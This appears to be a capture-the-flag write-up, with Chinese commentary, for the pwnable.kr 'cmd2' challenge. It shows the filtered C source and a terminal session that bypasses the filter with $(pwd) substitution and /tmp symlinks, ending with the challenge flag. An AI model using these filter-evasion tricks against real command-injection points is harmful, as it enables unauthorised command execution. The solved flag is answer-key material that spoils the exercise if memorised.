cmd2@pwnable:~$ cat cmd2.c
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}
extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}
int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}
解题过程:
cmd2@pwnable:/$ pwd
/
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)flag
> ^C
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)flag"
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)bin$(pwd)cat $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"
cmd2@pwnable:/$ /home/cmd2
cmd2/ cmd2_pwn/
cmd2@pwnable:/$ /home/cmd2/cmd2 'test'
test
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)"
cmd2@pwnable:/$ /home/cmd2/cmd2 '"$(pwd)"'
"$(pwd)"
sh: 1: /: Permission denied
cmd2@pwnable:/$ /home/cmd2/cmd2 '"$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"'
"$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"
sh: 1: /tmp/gwcmd2/bbb /tmp/gwcmd2/ccc: not found
cmd2@pwnable:/$ ls /tmp/gwcmd2/
aaaaa bbb ccc
cmd2@pwnable:/$ ls /tmp/gwcmd2/ -al
total 342244
drwxrwxr-x 2 cmd2 cmd2 4096 Mar 26 11:05 .
drwxrwx-wt 1708 root root 350445568 Mar 26 11:34 ..
lrwxrwxrwx 1 cmd2 cmd2 15 Mar 26 11:05 aaaaa -> /home/cmd2/cmd2
lrwxrwxrwx 1 cmd2 cmd2 8 Mar 26 11:05 bbb -> /bin/cat
lrwxrwxrwx 1 cmd2 cmd2 15 Mar 26 11:05 ccc -> /home/cmd2/flag
cmd2@pwnable:/$ ./tmp/gwcmd2/bbb 'test'
./tmp/gwcmd2/bbb: test: No such file or directory
cmd2@pwnable:/$ /home/cmd2/cmd2 '""$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc""'
""$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc""
FuN_w1th_5h3ll_v4riabl3s_haha
cmd2@pwnable:/$ /home/cmd2/cmd2 ""$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc""
cmd2@pwnable:/$ /home/cmd2/cmd2 '$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc'
$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc
FuN_w1th_5h3ll_v4riabl3s_haha
必须要 '"" xxx ""' 才能被正确执行?
""xx"" 会被过滤
'"xx"' 提示 not found
' ' 也可以哦
所以要用单引号,否则可能内容被解释了。
不过能想到切换根目录,用 $(pwd) 绕过 '/' 的思路,也是够牛逼了,还要懂特殊的shell命令格式。